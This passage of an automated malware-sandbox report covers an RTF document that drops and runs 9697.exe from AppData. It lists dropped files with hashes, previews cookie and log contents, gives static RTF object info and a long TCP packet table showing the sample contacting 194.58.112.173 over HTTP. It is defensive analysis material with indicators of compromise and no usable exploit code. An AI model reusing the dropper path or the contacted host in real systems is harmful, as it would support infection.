                                                                                                                                                                                                              Entropy (8bit):4.3972526179705484
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:9MNQnUjsUcFTgkrLHMLCdXv7YeVUUVVqHWja7adS0n:9Ms6svhfHMLU+UDW2IadS0
                                                                                                                                                                                                              MD5:055593B263A59A58C5F49EEC2D0A8212
                                                                                                                                                                                                              SHA1:935C0D0C293F5D127AAF361AB626B40BAA5C2FBF
                                                                                                                                                                                                              SHA-256:8BE66EEF2212A60020C1ECBB6B14BC30BC7E73330EBC6C5374CB5AC09798569F
                                                                                                                                                                                                              SHA-512:FCB89065E07B448F99C4787AF70512AF8C22EC98028BB3E0443D352BB2FD31A29DB1F05010976FE9727C44A842A12D9B0490ACB600F1E2334F5A5EB32EDACA83
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: SRM_B.336584BA72BC6F9620B1948F76BC6EAC.c.bing.com/.2147484673.1501103744.30964136.636133931.30885757.*.
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\Z9222GFZ.txt
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):815
                                                                                                                                                                                                              Entropy (8bit):4.777898247456001
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:vQJpXmhjsvhK9ic2O6RPTVrbqtJTVeThnsTVwUS8c5QTVttslTRHXYjTVi9XJLrw:vQJNmiprjOos69ljKylJXYE/0n
                                                                                                                                                                                                              MD5:9A5CB5A782C6DA27DFE8028AF8E9FD98
                                                                                                                                                                                                              SHA1:B849E50208058979B519088AB2539B85D2169335
                                                                                                                                                                                                              SHA-256:C8EAB23206D6872AF980DA587B988CD390277FD7E1DC0F38E1BA9E1C7DE5F88B
                                                                                                                                                                                                              SHA-512:62758B9ECE9FDCAEFBE94AAC52DE2048D2C87ABD4D4ECC0B9096A7E0BAB2A7C4135280059A872F6A9CA54BC9A410F3990EEB818D8D88E7B384B2F94C1CE85444
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: defCulture.en-US.xbox.com/.1536.2897926528.31032532.625525913.30885757.*.MUID.336584BA72BC6F9620B1948F76BC6EAC.xbox.com/.1025.1491103744.30964136.633013926.30885757.*.mbox.session#e5f0af1807f74eb8b0283f40d170bf39#1620859948|PC#e5f0af1807f74eb8b0283f40d170bf39.37_0#1655044786.xbox.com/.1600.1120937216.30965354.647033993.30885757.*.UtcOffsetMinutes.-420.xbox.com/.1600.515165568.30891792.646496989.30885757.*._cs_c.0.xbox.com/.1601.1804203904.30965301.686504450.30885757.*.__CT_Data.gpv=1&ckp=tld&dm=xbox.com&apv_1002_www32=1.xbox.com/.1600.2719088128.30959182.696538469.30885757.*._cs_id.5bfeb22c-810a-af41-b542-7da132b42761.1620858092.1.1620858092.1620858092.1613561419.1655022092366.None.1.xbox.com/.1601.1814203904.30965301.696538469.30885757.*._cs_s.1.1.xbox.com/.1601.1512927744.30885761.696538469.30885757.*.
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\ZHSAPRWD.txt
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):542
                                                                                                                                                                                                              Entropy (8bit):5.095908132386154
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:fdwVgCTDEXbPzrUUAZ+mTDMTV3G0vRmjFUvH/TDMTVvXKw+JjwfeTDMTVeh3n:lw1ijzrUDuzmjFUvHL8f+JKun
                                                                                                                                                                                                              MD5:2D48D9BDF733B5980A8E569E3C15BA3E
                                                                                                                                                                                                              SHA1:54611B01955DA980119A7BE4D62CB48AA7F2990F
                                                                                                                                                                                                              SHA-256:ACDA50E9ECDCBB92ED48457771C01085139C26A25B8F50ECFBE29D67F6A0D509
                                                                                                                                                                                                              SHA-512:89D7D0490DD47DA1E42CB350BEB7455F490AB114F89EE9F0A9344772930B1536BD25FBBB9102AE96B61461F83463C8CFF0470D6C6A60BEDA887DAEE00CBF181D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: EXPID.26493f44-f65d-403a-b917-a0ea2ea94303.support.microsoft.com/.9217.591635328.30959107.336011964.30885757.*.MicrosoftApplicationsTelemetryDeviceId.2537901c-f6e2-4d47-aabe-716f4e285677.support.microsoft.com/.1601.3864055424.30959181.1843023150.30885756.*.ai_session.wx84LX6Z6xYlTnVRXca0Cd|1620857777572|1620858037819.support.microsoft.com/.1601.962927744.30885761.151076426.30885757.*.MSFPC.GUID=f63cc8971c8549c3bc91f5d42f53c6b1&HASH=f63c&LV=202105&V=4&LU=1620825389018.support.microsoft.com/.1601.2106602624.30959106.1850043162.30885756.*.
                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\O8F8AS1USI6WUSQLWYSH.temp
                                                                                                                                                                                                              Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5026
                                                                                                                                                                                                              Entropy (8bit):3.100553612988077
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:0dmnvZYdIi9GroIGASJxndmnvZYdIB683GroIaXxEdmnvZYdIR9GroI35xL:VvZ699S7UxIvZ6+3SWxlvZ629SpxL
                                                                                                                                                                                                              MD5:5AE88F3244727742084C44830DD07B9A
                                                                                                                                                                                                              SHA1:9F47EF1ADCF00DF7233A977F9DABB12B0DC30B24
                                                                                                                                                                                                              SHA-256:032AD75DE076EC8168BAECF147A43CDA541B7AED1CACA244C9A50EEE7DD66420
                                                                                                                                                                                                              SHA-512:CDDBC5228E8C9A6C4C1C599C6C2C7E7CF1840D62379F8D2AFA6DCBF5FFE4747BB0D29B895D46D6FF6BB9A42CBC74C1A46D0A57BCB3B0D7FC323FD332FA2B115F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: ...................................FL..................F.@ . ....b.$....b.$....b.$....l...........................P.O. .:i.....+00.../C:\.....................1.....~Jav..PROGRA~1..p.......:..~Jav*...<...............F.....P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....h.1.....wJ.~..INTERN~1..P.......:..wJ.~*.........................I.n.t.e.r.n.e.t. .E.x.p.l.o.r.e.r.....b.2..l..wJD~ .iexplore.exe..F......wJD~wJD~*....H....................i.e.x.p.l.o.r.e...e.x.e.......^...............-.......]....................C:\Program Files\Internet Explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\system32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.I.E.F.R.A.M.E
                                                                                                                                                                                                              C:\Users\user\Desktop\~$bYDInO.rtf
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):162
                                                                                                                                                                                                              Entropy (8bit):2.431160061181642
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
                                                                                                                                                                                                              MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
                                                                                                                                                                                                              SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
                                                                                                                                                                                                              SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
                                                                                                                                                                                                              SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...
                                                                                                                                                                                                              C:\Windows\Logs\MoSetup\BlueBox.log
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\9697.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2118
                                                                                                                                                                                                              Entropy (8bit):5.200344509939095
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:J2WjqjaljDe0IXZsUSnXZm0ySqD65hLlTC8C7Abh59yms+2K2DqalTAQoSgEMFgY:J6QDe0qIU0BWAwZ+CpoSgEMeY0h+
                                                                                                                                                                                                              MD5:7966FBE01C34812DEF2DED50B1B2F647
                                                                                                                                                                                                              SHA1:0CA94623FA31085ED0D5753142B6A33ADB884056
                                                                                                                                                                                                              SHA-256:BF6795128C1E2EC33389941F74E3B89DE65F3CD1CA54F618BA45607557AE9884
                                                                                                                                                                                                              SHA-512:026116C29DE0DE10388A573CBA2C7E050FA2AF3F0EC27DEBD82F7AD9D64494ACD3856480E449DE1A1F6560EE995C84170B78A47AF5477F251CD62D1B494C3E94
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: .2021-05-12 15:15:49: BuildInfo: [10.0.19041.572 (vb_release_svc_prod1.201007-1724)]..2021-05-12 15:15:49: CommandLine: [C:\Users\user\AppData\Roaming\9697.exe]..2021-05-12 15:15:49: Opening Box: [C:\Users\user\AppData\Roaming\9697.exe]..2021-05-12 15:15:49: Opening Box Result: [0x0]..2021-05-12 15:15:49: Deleting box result.....2021-05-12 15:15:49: Registering [$Windows.~WS] working directory for disk cleanup..2021-05-12 15:15:49: Registering [ESD\Download] ESD image download directory for disk cleanup..2021-05-12 15:15:49: Creating path: [C:\$Windows.~WS\Sources].....2021-05-12 15:15:49: Checking cleanup registry value.....2021-05-12 15:15:49: Cleanup value missing... assuming no cleanup...2021-05-12 15:15:49: Skipping cleanup...2021-05-12 15:15:49: Preserve working path: [No]..2021-05-12 15:15:49: Cleaning alternate storage paths.....2021-05-12 15:15:49: Cleaning MoSetup Volatile key.....2021-05-12 15:15:49: Removing CorrelationVector registry value.....2021-05-12 15:15:49: Remo

                                                                                                                                                                                                              Static File Info

                                                                                                                                                                                                              General

                                                                                                                                                                                                              File type:Rich Text Format data, unknown version
                                                                                                                                                                                                              Entropy (8bit):4.1797153717087525
                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                              • Rich Text Format (5005/1) 55.56%
                                                                                                                                                                                                              • Rich Text Format (4004/1) 44.44%
                                                                                                                                                                                                              File name:7bYDInO.rtf
                                                                                                                                                                                                              File size:62896
                                                                                                                                                                                                              MD5:847b071fa537e21507e78c80b5aa7d59
                                                                                                                                                                                                              SHA1:9455119a6522727905dd14ee3b29e87f55e88a26
                                                                                                                                                                                                              SHA256:a60f4a353ea89adc8def453c8a1e65ea2ecc46c64d0d9ea375ca4e85e1c428fd
                                                                                                                                                                                                              SHA512:e922e3041652cf3ad25a88247c998787e11b7d7f790f9981cfb0fe661e2b090631f01c399b3534adf4947725d43e9e1992525b9f7642f186b305a8b7bf4d981b
                                                                                                                                                                                                              SSDEEP:1536:O9tZyPE5XDHEurerYLJdSpUIQXMfzYC+mdk2W3FV5C:Ky85XDH1XSpBzYzmO2W3w
                                                                                                                                                                                                              File Content Preview:{\rtf4396{\object44866732 \'' \objhtml92961791\+\objupdate3338104833381048\objw9486\objh5680{\*\objdata70585 {{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{\bin0000000000 {\*\objdata70585

                                                                                                                                                                                                              File Icon

                                                                                                                                                                                                              Icon Hash:e4eea2aaa4b4b4a4

                                                                                                                                                                                                              Static RTF Info

                                                                                                                                                                                                              Objects

                                                                                                                                                                                                              IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                                                                                                                                                                              0000000F7hno
                                                                                                                                                                                                              10000009Chno

                                                                                                                                                                                                              Network Behavior

                                                                                                                                                                                                              Network Port Distribution

                                                                                                                                                                                                              TCP Packets

                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                              May 12, 2021 15:15:51.191204071 CEST4916580192.168.2.22194.58.112.173
                                                                                                                                                                                                              May 12, 2021 15:15:51.271774054 CEST8049165194.58.112.173192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:15:51.271883011 CEST4916580192.168.2.22194.58.112.173
                                                                                                                                                                                                              May 12, 2021 15:15:51.272207022 CEST4916580192.168.2.22194.58.112.173
                                                                                                                                                                                                              May 12, 2021 15:15:51.354423046 CEST8049165194.58.112.173192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:15:51.361237049 CEST8049165194.58.112.173192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:15:51.361260891 CEST8049165194.58.112.173192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:15:51.361500025 CEST4916580192.168.2.22194.58.112.173
                                                                                                                                                                                                              May 12, 2021 15:15:51.361545086 CEST4916580192.168.2.22194.58.112.173
                                                                                                                                                                                                              May 12, 2021 15:15:51.442197084 CEST8049165194.58.112.173192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:22.168414116 CEST49195443192.168.2.22104.16.18.94
                                                                                                                                                                                                              May 12, 2021 15:16:22.168814898 CEST49194443192.168.2.22104.16.18.94
                                                                                                                                                                                                              May 12, 2021 15:16:22.209121943 CEST44349195104.16.18.94192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:22.209187031 CEST49195443192.168.2.22104.16.18.94
                                                                                                                                                                                                              May 12, 2021 15:16:22.209769964 CEST44349194104.16.18.94192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:22.209852934 CEST49194443192.168.2.22104.16.18.94
                                                                                                                                                                                                              May 12, 2021 15:16:22.238567114 CEST49195443192.168.2.22104.16.18.94
                                                                                                                                                                                                              May 12, 2021 15:16:22.240642071 CEST49194443192.168.2.22104.16.18.94
                                                                                                                                                                                                              May 12, 2021 15:16:22.281128883 CEST44349195104.16.18.94192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:22.281541109 CEST44349194104.16.18.94192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:22.282473087 CEST44349194104.16.18.94192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:22.282493114 CEST44349194104.16.18.94192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:22.282527924 CEST49194443192.168.2.22104.16.18.94
                                                                                                                                                                                                              May 12, 2021 15:16:22.282552958 CEST49194443192.168.2.22104.16.18.94
                                                                                                                                                                                                              May 12, 2021 15:16:22.283078909 CEST44349195104.16.18.94192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:22.283097982 CEST44349195104.16.18.94192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:22.283149004 CEST49195443192.168.2.22104.16.18.94
                                                                                                                                                                                                              May 12, 2021 15:16:22.283175945 CEST49195443192.168.2.22104.16.18.94
                                                                                                                                                                                                              May 12, 2021 15:16:22.476667881 CEST49195443192.168.2.22104.16.18.94
                                                                                                                                                                                                              May 12, 2021 15:16:22.503269911 CEST49194443192.168.2.22104.16.18.94
                                                                                                                                                                                                              May 12, 2021 15:16:22.517342091 CEST44349195104.16.18.94192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:22.517915010 CEST44349195104.16.18.94192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:22.518007994 CEST49195443192.168.2.22104.16.18.94
                                                                                                                                                                                                              May 12, 2021 15:16:22.544354916 CEST44349194104.16.18.94192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:22.544595957 CEST44349194104.16.18.94192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:22.544723034 CEST49194443192.168.2.22104.16.18.94
                                                                                                                                                                                                              May 12, 2021 15:16:22.547115088 CEST49195443192.168.2.22104.16.18.94
                                                                                                                                                                                                              May 12, 2021 15:16:22.587838888 CEST44349195104.16.18.94192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:22.604665041 CEST44349195104.16.18.94192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:22.604688883 CEST44349195104.16.18.94192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:22.604711056 CEST44349195104.16.18.94192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:22.604727983 CEST44349195104.16.18.94192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:22.604752064 CEST44349195104.16.18.94192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:22.604772091 CEST44349195104.16.18.94192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:22.604795933 CEST44349195104.16.18.94192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:22.604811907 CEST44349195104.16.18.94192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:22.604844093 CEST49195443192.168.2.22104.16.18.94
                                                                                                                                                                                                              May 12, 2021 15:16:22.604871988 CEST49195443192.168.2.22104.16.18.94
                                                                                                                                                                                                              May 12, 2021 15:16:22.605149031 CEST44349195104.16.18.94192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:22.605169058 CEST44349195104.16.18.94192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:22.605232000 CEST49195443192.168.2.22104.16.18.94
                                                                                                                                                                                                              May 12, 2021 15:16:22.605664968 CEST44349195104.16.18.94192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:22.605699062 CEST44349195104.16.18.94192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:22.605753899 CEST49195443192.168.2.22104.16.18.94
                                                                                                                                                                                                              May 12, 2021 15:16:22.606678963 CEST44349195104.16.18.94192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:22.606708050 CEST44349195104.16.18.94192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:22.606719017 CEST49195443192.168.2.22104.16.18.94
                                                                                                                                                                                                              May 12, 2021 15:16:22.606751919 CEST49195443192.168.2.22104.16.18.94
                                                                                                                                                                                                              May 12, 2021 15:16:22.606772900 CEST49195443192.168.2.22104.16.18.94
                                                                                                                                                                                                              May 12, 2021 15:16:22.607676983 CEST44349195104.16.18.94192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:22.607708931 CEST44349195104.16.18.94192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:22.607795954 CEST49195443192.168.2.22104.16.18.94
                                                                                                                                                                                                              May 12, 2021 15:16:22.607815981 CEST49195443192.168.2.22104.16.18.94
                                                                                                                                                                                                              May 12, 2021 15:16:22.608664036 CEST44349195104.16.18.94192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:22.608691931 CEST44349195104.16.18.94192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:22.608738899 CEST49195443192.168.2.22104.16.18.94
                                                                                                                                                                                                              May 12, 2021 15:16:22.608761072 CEST49195443192.168.2.22104.16.18.94
                                                                                                                                                                                                              May 12, 2021 15:16:22.609669924 CEST44349195104.16.18.94192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:22.609695911 CEST44349195104.16.18.94192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:22.609755039 CEST49195443192.168.2.22104.16.18.94
                                                                                                                                                                                                              May 12, 2021 15:16:22.610646963 CEST44349195104.16.18.94192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:22.610673904 CEST44349195104.16.18.94192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:22.610726118 CEST49195443192.168.2.22104.16.18.94
                                                                                                                                                                                                              May 12, 2021 15:16:22.610744953 CEST49195443192.168.2.22104.16.18.94
                                                                                                                                                                                                              May 12, 2021 15:16:22.611767054 CEST44349195104.16.18.94192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:22.611795902 CEST44349195104.16.18.94192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:22.611845016 CEST49195443192.168.2.22104.16.18.94
                                                                                                                                                                                                              May 12, 2021 15:16:22.611864090 CEST49195443192.168.2.22104.16.18.94
                                                                                                                                                                                                              May 12, 2021 15:16:22.612638950 CEST44349195104.16.18.94192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:22.612662077 CEST44349195104.16.18.94192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:22.612716913 CEST49195443192.168.2.22104.16.18.94
                                                                                                                                                                                                              May 12, 2021 15:16:22.613807917 CEST44349195104.16.18.94192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:22.613837004 CEST44349195104.16.18.94192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:22.613889933 CEST49195443192.168.2.22104.16.18.94
                                                                                                                                                                                                              May 12, 2021 15:16:22.613914013 CEST49195443192.168.2.22104.16.18.94
                                                                                                                                                                                                              May 12, 2021 15:16:22.614608049 CEST44349195104.16.18.94192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:22.614628077 CEST44349195104.16.18.94192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:22.614674091 CEST49195443192.168.2.22104.16.18.94
                                                                                                                                                                                                              May 12, 2021 15:16:22.614695072 CEST49195443192.168.2.22104.16.18.94
                                                                                                                                                                                                              May 12, 2021 15:16:25.714056969 CEST49195443192.168.2.22104.16.18.94
                                                                                                                                                                                                              May 12, 2021 15:16:37.252830982 CEST44349194104.16.18.94192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:37.252896070 CEST49194443192.168.2.22104.16.18.94
                                                                                                                                                                                                              May 12, 2021 15:16:37.253021002 CEST44349194104.16.18.94192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:16:37.253067017 CEST49194443192.168.2.22104.16.18.94
                                                                                                                                                                                                              May 12, 2021 15:18:19.441804886 CEST49195443192.168.2.22104.16.18.94
                                                                                                                                                                                                              May 12, 2021 15:18:19.442321062 CEST49194443192.168.2.22104.16.18.94
                                                                                                                                                                                                              May 12, 2021 15:18:19.442344904 CEST49194443192.168.2.22104.16.18.94
                                                                                                                                                                                                              May 12, 2021 15:18:19.484915972 CEST44349195104.16.18.94192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:18:19.484985113 CEST49195443192.168.2.22104.16.18.94
                                                                                                                                                                                                              May 12, 2021 15:21:04.790966034 CEST49256443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:04.812855959 CEST49257443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:04.834511995 CEST44349256151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:04.834696054 CEST49256443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:04.835313082 CEST49256443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:04.856376886 CEST44349257151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:04.856700897 CEST49257443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:04.857052088 CEST49257443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:04.878830910 CEST44349256151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:04.878880978 CEST44349256151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:04.878914118 CEST44349256151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:04.878938913 CEST49256443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:04.878978014 CEST49256443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:04.881072044 CEST49256443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:04.886224031 CEST49259443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:04.900661945 CEST44349257151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:04.900701046 CEST44349257151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:04.900721073 CEST44349257151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:04.900830030 CEST49257443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:04.901478052 CEST49257443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:04.902431965 CEST49260443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:04.924531937 CEST44349256151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:04.929698944 CEST44349259151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:04.929754972 CEST49259443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:04.938961983 CEST49259443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:04.944971085 CEST44349257151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:04.945787907 CEST44349260151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:04.945888996 CEST49260443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:04.949512005 CEST49260443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:04.984508991 CEST44349259151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:04.984540939 CEST44349259151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:04.984553099 CEST44349259151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:04.984674931 CEST49259443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:04.994525909 CEST44349260151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:04.997797966 CEST44349260151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:04.997828007 CEST44349260151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:04.997894049 CEST49260443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:05.019139051 CEST49259443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:05.019263983 CEST49260443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:05.022483110 CEST49261443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:05.022577047 CEST49262443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:05.062601089 CEST44349260151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:05.062640905 CEST44349259151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:05.065994978 CEST44349261151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:05.066068888 CEST44349262151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:05.066175938 CEST49261443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:05.066235065 CEST49262443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:05.066612959 CEST49262443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:05.067063093 CEST49261443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:05.089720964 CEST49263443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:05.090217113 CEST49264443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:05.110183954 CEST44349262151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:05.110244036 CEST49262443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:05.110559940 CEST44349261151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:05.110618114 CEST49261443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:05.133306026 CEST44349263151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:05.133460045 CEST49263443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:05.133657932 CEST44349264151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:05.133723021 CEST49264443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:05.134407043 CEST49264443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:05.134789944 CEST49263443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:05.177922964 CEST44349264151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:05.177954912 CEST44349264151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:05.177973032 CEST44349264151.101.1.192192.168.2.22
                                                                                                                                                                                                              May 12, 2021 15:21:05.178035021 CEST49264443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:05.178077936 CEST49264443192.168.2.22151.101.1.192
                                                                                                                                                                                                              May 12, 2021 15:21:05.178291082 CEST44349263151.101.1.192192.168.2.22
